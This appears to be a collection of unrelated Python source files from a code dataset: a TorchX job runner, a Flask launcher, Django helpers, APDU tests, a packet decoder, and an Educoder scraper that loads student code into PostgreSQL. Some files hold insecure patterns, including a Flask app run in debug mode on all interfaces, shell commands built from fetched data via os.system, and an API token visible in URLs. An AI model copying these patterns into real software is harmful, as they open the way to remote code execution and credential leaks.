dryrun_info = session.dryrun(app, scheduler="local", cfg)
print(dryrun_info)
"""
# input validation
if not app.roles:
raise ValueError(
f"No roles for app: {app.name}. Did you forget to add roles to AppDef?"
)
for role in app.roles:
if not role.entrypoint:
raise ValueError(
f"No entrypoint for role: {role.name}."
f" Did you forget to call role.runs(entrypoint, args, env)?"
)
if role.num_replicas <= 0:
raise ValueError(
f"Non-positive replicas for role: {role.name}."
f" Did you forget to set role.num_replicas?"
)
cfg = cfg or dict()
with log_event("dryrun", scheduler, runcfg=json.dumps(cfg) if cfg else None):
sched = self._scheduler(scheduler)
sched._validate(app, scheduler)
dryrun_info = sched.submit_dryrun(app, cfg)
dryrun_info._scheduler = scheduler
return dryrun_info
def run_opts(self) -> Dict[str, runopts]:
"""
Returns the ``runopts`` for the supported scheduler backends.
Usage:
::
local_runopts = session.run_opts()["local"]
print("local scheduler run options: {local_runopts}")
Returns:
A map of scheduler backend to its ``runopts``
"""
return {
scheduler_backend: scheduler.run_opts()
for scheduler_backend, scheduler in self._schedulers.items()
}
def scheduler_backends(self) -> List[SchedulerBackend]:
"""
Returns a list of all supported scheduler backends.
"""
return list(self._schedulers.keys())
def status(self, app_handle: AppHandle) -> Optional[AppStatus]:
"""
Returns:
The status of the application, or ``None`` if the app does not exist anymore
(e.g. was stopped in the past and removed from the scheduler's backend).
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("status", scheduler_backend, app_id):
desc = scheduler.describe(app_id)
if not desc:
# app does not exist on the scheduler
# remove it from apps cache if it exists
# effectively removes this app from the list() API
self._apps.pop(app_handle, None)
return None
app_status = AppStatus(
desc.state,
desc.num_restarts,
msg=desc.msg,
structured_error_msg=desc.structured_error_msg,
roles=desc.roles_statuses,
)
if app_status:
app_status.ui_url = desc.ui_url
return app_status
def wait(
self, app_handle: AppHandle, wait_interval: float = 10
) -> Optional[AppStatus]:
"""
Block waits (indefinitely) for the application to complete.
Possible implementation:
::
while(True):
app_status = status(app)
if app_status.is_terminal():
return
sleep(10)
Args:
app_handle: the app handle to wait for completion
wait_interval: the minimum interval to wait before polling for status
Returns:
The terminal status of the application, or ``None`` if the app does not exist anymore
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("wait", scheduler_backend, app_id):
while True:
app_status = self.status(app_handle)
if not app_status:
return None
if app_status.is_terminal():
return app_status
else:
time.sleep(wait_interval)
def list(self) -> Dict[AppHandle, AppDef]:
"""
Returns the applications that were run with this session mapped by the app handle.
The persistence of the session is implementation dependent.
"""
with log_event("list"):
app_ids = list(self._apps.keys())
for app_id in app_ids:
self.status(app_id)
return self._apps
def stop(self, app_handle: AppHandle) -> None:
"""
Stops the application, effectively directing the scheduler to cancel
the job. Does nothing if the app does not exist.
.. note:: This method returns as soon as the cancel request has been
submitted to the scheduler. The application will be in a
``RUNNING`` state until the scheduler actually terminates
the job. If the scheduler successfully interrupts the job
and terminates it the final state will be ``CANCELLED``
otherwise it will be ``FAILED``.
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(app_handle)
with log_event("stop", scheduler_backend, app_id):
status = self.status(app_handle)
if status is not None and not status.is_terminal():
scheduler.cancel(app_id)
def describe(self, app_handle: AppHandle) -> Optional[AppDef]:
"""
Reconstructs the application (to the best extent) given the app handle.
Note that the reconstructed application may not be the complete app as
it was submitted via the run API. How much of the app can be reconstructed
is scheduler dependent.
Returns:
AppDef or None if the app does not exist anymore or if the
scheduler does not support describing the app handle
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("describe", scheduler_backend, app_id):
# if the app is in the apps list, then short circuit everything and return it
app = self._apps.get(app_handle, None)
if not app:
desc = scheduler.describe(app_id)
if desc:
app = AppDef(name=app_id, roles=desc.roles)
return app
def log_lines(
self,
app_handle: AppHandle,
role_name: str,
k: int = 0,
regex: Optional[str] = None,
since: Optional[datetime] = None,
until: Optional[datetime] = None,
should_tail: bool = False,
streams: Optional[Stream] = None,
) -> Iterable[str]:
"""
Returns an iterator over the log lines of the specified job container.
.. note:: #. ``k`` is the node (host) id NOT the ``rank``.
#. ``since`` and ``until`` need not always be honored (depends on scheduler).
.. warning:: The semantics and guarantees of the returned iterator is highly
scheduler dependent. See ``torchx.specs.api.Scheduler.log_iter``
for the high-level semantics of this log iterator. For this reason
it is HIGHLY DISCOURAGED to use this method for generating output
to pass to downstream functions/dependencies. This method
DOES NOT guarantee that 100% of the log lines are returned.
It is totally valid for this method to return no or partial log lines
if the scheduler has already totally or partially purged log records
for the application.
Usage:
::
app_handle = session.run(app, scheduler="local", cfg=Dict[str, ConfigValue]())
print("== trainer node 0 logs ==")
for line in session.log_lines(app_handle, "trainer", k=0):
print(line)
Discouraged anti-pattern:
::
# DO NOT DO THIS!
# parses accuracy metric from log and reports it for this experiment run
accuracy = -1
for line in session.log_lines(app_handle, "trainer", k=0):
if matches_regex(line, "final model_accuracy:[0-9]*"):
accuracy = parse_accuracy(line)
break
report(experiment_name, accuracy)
Args:
app_handle: application handle
role_name: role within the app (e.g. trainer)
k: k-th replica of the role to fetch the logs for
regex: optional regex filter, returns all lines if left empty
since: datetime based start cursor. If left empty begins from the
first log line (start of job).
until: datetime based end cursor. If left empty, follows the log output
until the job completes and all log lines have been consumed.
Returns:
An iterator over the role k-th replica of the specified application.
Raise:
UnknownAppException: if the app does not exist in the scheduler
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("log_lines", scheduler_backend, app_id):
if not self.status(app_handle):
raise UnknownAppException(app_handle)
log_iter = scheduler.log_iter(
app_id,
role_name,
k,
regex,
since,
until,
should_tail,
streams=streams,
)
return log_iter
def _scheduler(self, scheduler: SchedulerBackend) -> Scheduler:
sched = self._schedulers.get(scheduler)
if not sched:
raise KeyError(
f"Undefined scheduler backend: {scheduler}. Use one of: {self._schedulers.keys()}"
)
return sched
def _scheduler_app_id(
self, app_handle: AppHandle, check_session: bool = True
) -> Tuple[Scheduler, str, str]:
"""
Returns the scheduler and app_id from the app_handle.
Set ``check_session`` to validate that the session name in the app handle
is the same as this session.
Raises:
ValueError: if ``check_session=True`` and the session in the app handle
does not match this session's name
KeyError: if no such scheduler backend exists
"""
scheduler_backend, _, app_id = parse_app_handle(app_handle)
scheduler = self._scheduler(scheduler_backend)
return scheduler, scheduler_backend, app_id
def __repr__(self) -> str:
return f"Runner(name={self._name}, schedulers={self._schedulers}, apps={self._apps})"
def get_runner(
name: Optional[str] = None,
component_defaults: Optional[Dict[str, Dict[str, str]]] = None,
**scheduler_params: Any,
) -> Runner:
"""
Convenience method to construct and get a Runner object. Usage:
.. code-block:: python
with get_runner() as runner:
app_handle = runner.run(component(args), scheduler="kubernetes", runcfg)
print(runner.status(app_handle))
Alternatively,
.. code-block:: python
runner = get_runner()
try:
app_handle = runner.run(component(args), scheduler="kubernetes", runcfg)
print(runner.status(app_handle))
finally:
runner.close()
Args:
name: human readable name that will be included as part of all launched
jobs.
scheduler_params: extra arguments that will be passed to the constructor
of all available schedulers.
"""
if not name:
name = "torchx"
schedulers = get_schedulers(session_name=name, **scheduler_params)
return Runner(name, schedulers, component_defaults)
|
StarcoderdataPython
|
106244
|
#!/usr/bin/python3
# IMPORTS
import logging
from modules import devMode
from website import create_app
# VARIABLES
app = create_app()
# MAIN
if __name__ == '__main__':
logging.basicConfig(filename='/var/log/peon/webui.log', filemode='a', format='%(asctime)s %(thread)d [%(levelname)s] - %(message)s', level=logging.INFO)
devMode()
logging.debug(app.run(host='0.0.0.0',port=80, debug=True))
|
StarcoderdataPython
|
1701582
|
<filename>chap25-functions/ex25.py
def break_words(stuff):
"""
This function will break up words for us
First: Print the whole sentence.
Second: Broken words will be printed
"""
result = stuff.split(' ')
print("whole sentence ={}".format(stuff))
print("broken words ={}".format(result))
print("")
return result
def sort_words(words):
"""Sorts the words."""
result = sorted(words)
print("whole sentence ={}".format(words))
print("sorted words ={}".format(result))
print("")
# Poop out
return result
def print_first_word(words):
"""Prints the first word after popping it off."""
word = words.pop(0)
print(word)
# Poop out
result = None
return result
def print_last_word(words):
"""Prints the last word after popping it off."""
word = words.pop(-1)
print(word)
# Poop out
result = None
return result
def sort_sentance(sentance):
"""Takes in a full sentance and returns the sorted words."""
words = break_words(sentance)
print(words)
# Poop out
result = None
return result
def print_first_and_last(sentance):
"""Prints the first and last words of the sentnace."""
words = break_words(sentance)
print_first_word(words)
print_last_word(words)
# Poop out
result = None
return result
def print_first_and_last_sorted(sentnace):
"""Sorts the words then prints the first and last one."""
words = sort_sentance(sentnace)
print_first_word(words)
print_last_word(words)
# Poop out
result = None
return result
def main():
# Block of code to break the sentence sentence_01
sentence_01 = "All good things come to those who wait."
words_01 = break_words(sentence_01)
# Sort words
sort_words(words_01)
# print(words_01)
# Block of code to break the sentence sentence_02
sentence_02 = "If you can't beat e'm, join e'm."
words_02 = break_words(sentence_02)
# Block of code to break the sentence sentence_03
sentence_03 = "I have no special talent. I am only passionately curious."
words_03 = break_words(sentence_03)
# Block of code to break the sentence sentence_04
sentence_04 = "All that we are is the result of what we have thought."
words_04 = break_words(sentence_04)
# Block of code to break the sentence sentence_05
sentence_05 = "The future depends on what we do during the present."
words_05 = break_words(sentence_05)
# Block of code to break the sentence sentence_06
sentence_06 = "I'm a monkey and i'm proud of it."
words_06 = break_words(sentence_06)
# Block of code to break the sentence sentence_07
sentence_07 = "Early to bed and early to rise, makes a man healthy, wealthy, and wise."
words_07 = break_words(sentence_07)
# Block of code to break the sentence sentence_08
sentence_08 = "I am thankful for all those who said NO to me. It's because of them i'm doing it myself."
words_08 = break_words(sentence_08)
# Block of code to break the sentence sentence_09
sentence_09 = "Early to bed and early to rise, makes a man healthy, wealthy, and wise."
words_09 = break_words(sentence_09)
# Block of code to break the sentence sentence_10
sentence_10 = "Pearls don't lie on the seashore. If you want one, you must dive for it."
words_10 = break_words(sentence_10)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3333797
|
<gh_stars>0
#
# dbtool for MongoDB
# version 1.0.0
#
# author: João 'Jam' Moraes
# license: MIT
#
import src as DBTool
import json
from sys import argv
DBTool.app(argv)
|
StarcoderdataPython
|
1659844
|
<filename>inventory/templatetags/indirect.py
from django import template
from util.validators import ViconfValidators
import sys
register = template.Library()
@register.simple_tag
def indirect(variable, key):
return variable[key]
@register.simple_tag
def validatorclass(name):
validators = ViconfValidators.VALIDATORS
if name == 'none':
return ""
if name in validators:
return validators[name]['css_class']
else:
return ""
|
StarcoderdataPython
|
1799484
|
<filename>src/run.py
# -*- coding: utf-8 -*-
"""The entry point for mtriage.
Orchestrates selectors and analysers via CLI parameters.
Modules:
Each module corresponds to a web platform API, or some equivalent method
of programmatic retrieval.
TODO: document where to find selector and analyser design docs.
Attributes:
module (str): Indicates the platform or source from which media should be
analysed. The code that implements is module is self-contained to a
folder here in the 'select' folder.
config (dict of str: str): Hyperparameters that refine the analyse space.
These parameters are module-specific (although the aim is to create as
consistent as possible a parameter language across modules).
folder (str): The path to the directory where the data that is indexed
during the SELECT pass will be saved. This directory serves as a kind of
"working directory" during the SAMPLE and ANALYSE passes, in the sense
that all generated data is saved in this directory. The directory also
contains logs, and represents the 'saved state' of a media triage
analysis.
"""
import os
import yaml
from validate import validate_yaml
from lib.common.get import get_module
from lib.common.storage import LocalStorage
CONFIG_PATH = "/run_args.yaml"
def make_storage(cfg: dict) -> LocalStorage:
# TODO: generalise `folder` here to a `storage` var that is passed from YAML
return LocalStorage(folder=cfg["folder"])
def _run_analyser(ana: dict, base_cfg: dict, cfg: dict):
# run a single analyser
Analyser = get_module("analyse", ana["name"])
analyser = Analyser(
{
**ana["config"],
**base_cfg
} if "config" in ana.keys() else base_cfg,
ana["name"],
make_storage(cfg),
)
analyser.start_analysing()
def _run_yaml():
with open(CONFIG_PATH, "r") as c:
cfg = yaml.safe_load(c)
validate_yaml(cfg)
base_cfg = {}
if "select" not in cfg and "elements_in" in cfg:
base_cfg["elements_in"] = cfg["elements_in"]
sel = None
else:
# run select
sel = cfg["select"]
Selector = get_module("select", sel["name"])
selector = Selector(
sel["config"] if "config" in sel.keys() else {},
sel["name"],
make_storage(cfg),
)
selector.start_indexing()
selector.start_retrieving()
base_cfg["elements_in"] = [sel["name"]]
if "analyse" not in cfg:
return
analyse_phase = cfg["analyse"]
if isinstance(analyse_phase, dict):
_run_analyser(analyse_phase, base_cfg, cfg)
else:
for ana in analyse_phase:
_run_analyser(ana, base_cfg, cfg)
if sel is None:
# take the selector from elements in
fst = cfg["elements_in"][0]
sel = {"name": fst.split("/")[0]}
base_cfg["elements_in"] = [f"{sel['name']}/{ana['name']}"]
if __name__ == "__main__":
_run_yaml()
|
StarcoderdataPython
|
1120
|
<reponame>sebastien-riou/SATL
import os
import pysatl
from pysatl import CAPDU
if __name__ == "__main__":
def check(hexstr, expected):
capdu = CAPDU.from_hexstr(hexstr)
if capdu != expected:
raise Exception("Mismatch for input '"+hexstr+"'\nActual: "+str(capdu)+"\nExpected: "+str(expected))
def gencase(* ,LC ,LE):
assert(LC < 0x10000)
assert(LE <= 0x10000)
data = os.getrandom(LC)
hexstr = "00112233"
case4 = LC>0 and LE>0
case4e = case4 and (LC>0xFF or LE>0x100)
if LC>0:
if LC>0xFF or case4e:
hexstr += "00%04X"%LC
else:
hexstr += "%02X" % LC
hexstr += pysatl.Utils.hexstr(data, separator="")
if LE>0:
if case4e:
if LE == 0x10000:
hexstr += "0000"
else:
hexstr += "%04X"%LE
elif LE == 0x10000:
hexstr += "000000"
elif LE>0x100:
hexstr += "00%04X"%LE
elif LE == 0x100:
hexstr += "00"
else:
hexstr += "%02X" % LE
expected = hexstr
capdu = CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33, DATA=data, LE=LE)
hexstr = capdu.to_hexstr()
if hexstr != expected:
raise Exception("Mismatch for LC=%d, LE=%d"%(LC,LE)+"\nActual: "+hexstr+"\nExpected: "+expected)
b = capdu.to_bytes()
assert(type(b) is bytes)
return (hexstr, capdu)
#check __repr__
expected = "pysatl.CAPDU.from_hexstr('00112233015502')"
capdu=None
exec("capdu="+expected)
assert(expected==repr(capdu))
#check well formed inputs
check("00112233", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("00 11 22 33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("0x00,0x11,0x22,0x33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
#check we tolerate less well formed inputs
check("00-11,22_33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("""0x00 0x11 0x22
0x33""", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("1 2 304", CAPDU(CLA=0x01, INS=0x02, P1=0x03, P2=0x04))
LC_cases = [0,1,2,254,255,256,257,65534,65535]
LE_cases = LC_cases + [65536]
for LC in LC_cases:
for LE in LE_cases:
print(LC,LE)
check(*gencase(LC=LC, LE=LE))
|
StarcoderdataPython
|
11778
|
<filename>hear_me_django_app/accounts/management/commands/initial_users.py
from django.contrib.auth import get_user_model
from django.contrib.auth.hashers import make_password
from django.core.management.base import BaseCommand
from ._private import populate_user
User = get_user_model()
class Command(BaseCommand):
help = 'admin deployment'
def add_arguments(self, parser):
parser.add_argument('total', type=int, help='Indicates the number of users to be created')
def handle(self, *args, **kwargs):
total = kwargs['total']
populate_user(number=total)
obj, created = User.objects.get_or_create(name="root", password=make_password('<PASSWORD>!'), is_superuser=True)
message = "Successfully populated database with initial users"
if created:
message += f" Superuser {obj.name} ha been created"
self.stdout.write(self.style.SUCCESS(message))
|
StarcoderdataPython
|
3361415
|
#!/usr/bin/python
# coding=UTF-8
import sys
import json
import urllib
import psycopg2
import git
import itertools
import os
import datetime
import time
import re
import urllib.request
student_amount = 300 #学生代码
db = psycopg2.connect(database="onlinejudge2", user="onlinejudge", password="<PASSWORD>", host="10.2.26.127", port="5432")
cursor = db.cursor()
code_copy=""
class Shixun(object):
def __init__(self,id,name,identifier):
self.id = id
self.name = name
self.identifier = identifier
self.user_ids = []
def get_shixun(self):
url = 'https://www.educoder.net/api/v1/sources/%s/shixun_detail?private_token=<KEY>' %self.identifier
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
self.myshixuns_count = res.get("myshixuns_count",0)
#print 'myshixuns_count',self.myshixuns_count
def get_myshixun(self,date='20190102'):
length = 1
pages = 0
this_amount = 0
while length != 0 and this_amount <= student_amount: #选500个学生
pages += 1
url = 'https://www.educoder.net/api/v1/sources/myshixuns_index?time=%s&private_token=hriEn3UwXfJs3PmyXnSG&page=%s' %(date,str(pages))
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
length = len(res)
for item in res:
item = item["myshixun"]
id = item.get("id","")
shixun_id = item.get("shixun_id","")
if shixun_id != self.id:
continue
user_id = item.get("user_id","")
####得到git_url######
url = 'https://www.educoder.net/api/v1/sources/search_myshixun?user_id=%s&shixun_id=%s&private_token=<KEY>' %(user_id,self.id)
reqq = urllib.request.Request(url)
res_dataa = urllib.request.urlopen(reqq)
ress = json.loads(res_dataa.read())
git_url = ress.get("git_url","")
#print 'git_url',git_url
###得到identity#####
for cha in self.challenge:
cha_id = cha.id
url = 'https://www.educoder.net/api/v1/sources/search_game?user_id=%s&challenge_id=%s&private_token=<KEY>' %(str(user_id),str(cha_id))
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
identifier = res.get("identifier","")
#print 'identifier',identifier
####用identifier来做submission_id#####
####code###########
path = cha.path
this_amount += self.get_code(identifier,user_id,path)
# #print self.user_ids
def git_clone(self,dir_name,git_url): #从git 下载到本地 code目录下
#print git_url
os.chdir(dir_name)
git.Git().clone(git_url)
def add_dir(self,dir_name): #创建目录
isExists=os.path.exists(dir_name)
if not isExists:
os.makedirs(dir_name)
def get_code(self,identifier,user_id,path): #代码下载到本地
amount = 0
url = 'https://www.educoder.net/api/v1/sources/%s/game_detail?private_token=<KEY>' %identifier
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
code_info = res
#print (res)
id = res.get("id","")
cid = res.get("challenge_id","")
commit_count = res.get("commit_count",0)
right = res.get("right","False")
final_score = res.get("final_score",0)
git_url = res.get("git_url","")
commit_status = res.get("commit_status",[])
status = '0'
if commit_count == 0 :
return amount
#print 'right:',right
#print 'commmit_count',commit_count
dir_name = '/home/nlsde/educoder/code/%s/%s' %(self.id,user_id)
if git_url:
self.add_dir(dir_name)
try:
self.git_clone(dir_name,git_url)
except:
pass
git_name = '%s/%s' %(dir_name,git_url.split('/')[-1].replace('.git',''))
os.chdir(git_name)
#print 'git_name',git_name
######传数据库1#################
submission_id = '%s-0' %identifier
code_dir = '%s/%s' %(git_name,path)
#time.sleep(1)
code_content = open(code_dir,'r',encoding='UTF-8').read()
code_r = chuli(code_content)
shixun_id = self.id
user_id = user_id
commit_count = commit_count
commit_number = 0 ###第几次
insert_info_root = "INSERT INTO \"submission_submission_python\" (shixun_id, challenge_id, student_id, submission_time, submission_count,submission_id,code,result,w_code,code_r) VALUES (%s,%s, %s, %s, %s,%s,%s,%s,'0',%s)"
list_tmp = [shixun_id, cid, user_id,commit_number,commit_count,submission_id,code_content,right,code_r]
result = cursor.execute(insert_info_root, list_tmp)
print(insert_info_root)
db.commit()
amount += 1
#print submission_id
#print code_dir
#print code_content
######如果只有一次提交##########
if commit_count == 1:
# print (amount)
return amount
#####得到git log中的提交时间######
os.system('git log > log')
git_log = open('log','r', encoding='UTF-8').readlines()
p1 = r'Date.*800'
pattern = re.compile(p1)
date_all = []
for line in git_log:
this = pattern.findall(line)
if this:
date_str = this[0]
date_str = date_str.replace('Date:','').replace('+0800','').strip()
date = datetime.datetime.strptime(date_str,"%a %b %d %H:%M:%S %Y")
date_all.append(date)
###### 得到commit_id###########
#commit_id_final = 'git log head -n 1 > now.txt'
for i,item in enumerate(commit_status):
if i == 0:
continue
submission_id2 = "%s-%s" %(identifier,str(i))
commit_time = item.get("commit_time","")
#print commit_time
#"2018-10-18T18:33:41+08:00",
commit_id = ''
if commit_time:
this_time = commit_time.strip().split('+')[0]
now = datetime.datetime.strptime(this_time,"%Y-%m-%dT%H:%M:%S")
last_date = date_all[0]
this_date = datetime.datetime.strftime(last_date,"%a %b %d %H:%M:%S %Y")
for git_date in date_all:
if last_date > now and git_date < now:
this_date = datetime.datetime.strftime(last_date,"%a %b %d %H:%M:%S %Y")
break
if last_date < now:
this_date = datetime.datetime.strftime(last_date,"%a %b %d %H:%M:%S %Y")
last_date = git_date
#print date_all[0]
mingling = 'git log | grep -B 2 "%s" | head -n 1 > now.txt' %this_date
#print mingling
return_mingling = os.system(mingling)
all_strs = open('now.txt','r').read()
if all_strs:
commit_id = all_strs.replace("\n","").split(" ")[-1]
#print 'commit_id',commit_id
#### 传数据库2########################
if commit_id:
mingling2 = 'git show %s:%s >code.txt' %(commit_id,path)
#print mingling2
os.system(mingling2)
#code_dir2 = '%s/%s' %(git_name,path)
code_content2 = open('code.txt','r',encoding='UTF-8').read()
if code_content2 == code_content:
#print '一样'
continue
#print submission_id2
#print code_dir
#print code_content2
shixun_id2 = self.id
user_id2 = user_id
commit_count2 = commit_count
commit_number2 = i ###第几次
code_content=code_content2
code_r = chuli(code_content)
amount += 1
right = 'false' #中间结果为false
insert_info_root2 = "INSERT INTO \"submission_submission_python\" (shixun_id, challenge_id, student_id, submission_time, submission_count,submission_id,code,result,w_code,code_r) VALUES (%s, %s, %s, %s, %s,%s,%s,%s,'0',%s)"
list_tmp2 = [shixun_id2, cid,user_id2,commit_number2,commit_count2,submission_id2,code_content,right,code_r]
cursor.execute(insert_info_root2, list_tmp2)
db.commit()
return amount
######################################
def get_challenge(self,): #得到该实训下所有的关卡
url = 'https://www.educoder.net/api/v1/sources/%s/shixun_challenges?private_token=<KEY>' %self.identifier
#具体例子 查看https://www.educoder.net/api/v1/sources/zlg2nmcf/shixun_challenges?private_token=<KEY>
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
self.challenge = []
for item in res:
id = item.get("id","")
name = item.get("name","")
path = item.get("path","")
ins = item.get("sets",[]) ####测试样例 格式[{"input":"","output":""}]
answer = item.get("answer","")
answer = chuli(answer)
content = item.get("task_pass","") ######题目内容
#######################chanlleng存入数据库#################################
#print(answer1.encode('utf-8'))
#print(answer.encode('utf-8'))
try:
entryfun = content.split('def')[1].split('(')[0].strip()
if len(entryfun)>10:
entryfun = 'main_none'
except Exception:
entryfun = 'main_none'
insert_info_root = "INSERT INTO \"submission_challenge\" (challenge_id, challenge_name, path, ins, answer,content,entryfun,children_num,level,parent_id,shixun_id,identifier) VALUES (%s, %s, %s, %s,%s,%s,%s,'0','0','0',%s,%s)"
list_tmp = [id, name,path,str(ins),answer,content,entryfun,self.id,self.identifier]
# print(str(ins))
cursor.execute(insert_info_root, list_tmp)
db.commit()
if id:
s_c = Challenge(id,self.id,name,path)
#s_c.get_student_challenge() #得到学生完成challenge
#print s_c.id
#print s_c.name
self.challenge.append(s_c)
print(s_c)
#break
def __str__(self,):
result = [self.id,self.name,self.identifier]
result = [str(i).encode("ascii") for i in result]
return str(result)
class Challenge(object):
def __init__(self,id,shixun_id,name,path):
self.id = id
self.shixun_id = shixun_id
self.name = name
self.path = path
self.submission = {}
def git_clone(self,dir_name,git_url): #从git 下载到本地 code目录下
#print git_url
os.chdir(dir_name)
git.Git().clone(git_url)
def get_code(self,identifier,result): #代码下载到本地
user_id = result["user_id"]
url = 'https://www.educoder.net/api/v1/sources/%s/game_detail?private_token=<KEY>' %identifier
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
code_info = res
##print res
id = res.get("id","")
commit_count = res.get("commit_count",0)
right = res.get("right","false")
final_score = res.get("final_score",0)
git_url = res.get("git_url","")
commit_status = res.get("commit_status",[])
if right == "false":
return
#print 'right',right
#print 'commmit_count',commit_count
if right == 'true':
status = '1'
dir_name = '/home/nlsde/educoder/code/%s/%s' %(self.id,user_id)
if git_url:
self.add_dir(dir_name)
try:
self.git_clone(dir_name,git_url)
except:
pass
for i,item in enumerate(commit_status):
submission_id = "%s%s" %(id,str(i))
##print item
def add_dir(self,dir_name): #创建目录
isExists=os.path.exists(dir_name)
if not isExists:
os.makedirs(dir_name)
def get_student_challenge(self,date='20190102'):
#url = 'https://www.educoder.net/api/v1/sources/lrmbky4hjp9a/game_detail?private_token=<KEY>'
url = 'https://www.educoder.net/api/v1/sources/games?time=%s&private_token=<KEY>' %date
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
self.student_challenge = {}
for item in res:
item = item['game']
user_id = item.get("user_id","")
identifier = item.get("identifier","")
myshixun_id = item.get("myshixun_id","")
if user_id:
result = {}
result["user_id"] = user_id
result["myshixun_id"] = myshixun_id
self.student_challenge[identifier] = result
code_info = self.get_code(identifier,result)
#result["code"] = code_info
##print result
####从这里开始################
def chuli(code):
code = code.replace("'",'"')
date_all = re.findall(r"[(]((.|\n)*?)[)]", code)
for item in date_all:
item = item[0]
item2 = item.replace("\n","").replace("\t","")
code = code.replace(item,item2)
#code = code.decode("utf8")
start = ' '
name = 'main_none'
try:
entryfun = code.split('def')[1].split('(')[0].strip()
if len(entryfun) > 10:
entryfun = 'main_none'
except:
entryfun = 'main_none'
if entryfun == 'main_none' or entryfun == 'print_':
result_code = ''
lines = code.split('\n')
hanshu = 'def %s():\n' %name
end = '%s()\n' %name
tag = -1
if 'import' not in code or 'coding' not in code:
tag = 1
for line in lines:
if line.strip() == "```python":
continue
regex = u"[\u4e00-\u9fa5]+"
res = re.findall(regex, line)
for item in res:
line = line.replace(item,'#') #中m~V~Gm~[0m~M0m~H~P#
if line.strip().startswith('#'): #m~H| m~Ym~G~J
continue
if line.startswith('import') or 'coding'in line or line.startswith('from'):
line = line + '\n'
tag = 1
elif tag == 1:
result_code += hanshu
line = start + line + '\n'
tag = 0
elif tag == -1:
continue
elif tag == 0:
line = start + line + '\n'
result_code += line
result_code += end
else:
result_code = ''
lines = code.split('\n')
for line in lines:
regex = u"[\u4e00-\u9fa5]+"
res = re.findall(regex, line)
for item in res:
line = line.replace(item,'#') #中m~V~Gm~[0m~M0m~H~P#
if line.startswith('#'):
continue
result_code += line+'\n'
return result_code
#identifiers = ['q4ixftoz']
identifiers = ['ku6lva8t', 'nfypjxhl', 'vff6ljxc', 'k4wg9b32', 'pw53ln4m', 'afvk9r35', 'q4ixftoz', 'ral8fjw9', '89zfsjbp', 'no9uv3g2', 'cztux23y', '4bflgcs8', '6w2xmtls', 'o4xa93mc', 'uctzevfx', 'wokspmut', 'pvwltoq8', 'i2vu5jnl', 'gr7j3apk', 'jk35u2fb', 'atbm74vp', 'vxbpihfe', 'fhc7p56a', 'zekp6f7u', '2slytwug', 'pbx7wzu8', 'fvlehyxp', 'mhbl84nq', 'ftqxgcol', 'h2rugyfp', 'igbc4rtw', 'oatsh64e', 'jxyng672', 'xzbft8gv', '7rnalquk', '69lkjf4g', 'm6nc38so', '9boaulx4', 'ivj49blf', 'mfugx52o', '67nayvtg', 'f39hiscw', 'c6k5i82o', '2y8t594n', 'nbixuzkf', '3bkzvpw7']
def download_shixun(date):
url = 'https://www.educoder.net/api/v1/sources/shixun_index?time=%s&private_token=hriEn3UwXfJs3PmyXnSG' %date
req = urllib.request.Request(url)
res_data = urllib.request.urlopen(req)
res = json.loads(res_data.read())
##print len(res)
for item in res:
item = item['shixun']
name = item.get("name","")
id = item.get("id","")
identifier = item.get("identifier","")
if id and 'Python' in name:
shixun = Shixun(id,name,identifier)
shixun.get_shixun()
#print shixun.name
#print shixun.identifier
for this_identifier in identifiers:
if identifier == this_identifier:
shixun.get_challenge()
shixun.get_myshixun()
download_shixun('20190102')
db.close()
|
StarcoderdataPython
|
1765746
|
import sys
from functools import reduce
def char_to_bin(c):
return "{0:04b}".format(int(c, 16))
def hex_to_bits(hex_string):
return ''.join(char_to_bin(c) for c in hex_string)
def decode(hex_string):
versions = []
packet = hex_to_bits(hex_string)
def process_packet(i):
def read(n):
nonlocal i
res = int(packet[i:i+n], 2)
i += n
return res
version = read(3)
versions.append(version)
type_id = read(3)
if type_id == 4:
literal = 0
not_last = True
while not_last:
data = read(5)
not_last = data & 0b10000
literal = (literal << 4) | (data & 0b01111)
return i, literal
else:
length_type_id = read(1)
values = []
if length_type_id == 0:
total_len = read(15)
j = i
i += total_len
while j < i:
j, val = process_packet(j)
values.append(val)
else:
num_packets = read(11)
for _ in range(num_packets):
i, val = process_packet(i)
values.append(val)
res = None
if type_id == 0:
res = sum(values)
elif type_id == 1:
res = reduce(lambda x,y: x*y, values)
elif type_id == 2:
res = min(values)
elif type_id == 3:
res = max(values)
elif type_id == 5:
res = int(values[0] > values[1])
elif type_id == 6:
res = int(values[0] < values[1])
elif type_id == 7:
res = int(values[0] == values[1])
return i, res
_, res = process_packet(0)
return sum(versions), res
def main(input_file):
with open(input_file, 'r') as f:
hex_string = f.read().strip()
val1, val2 = decode(hex_string)
print('Part 1:', val1)
print('Part 2:', val2)
if __name__ == '__main__':
input_file = sys.argv[-1] if len(sys.argv) > 1 else 'input.txt'
main(input_file)
|
StarcoderdataPython
|
3313187
|
# Copyright (c) 2013-2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
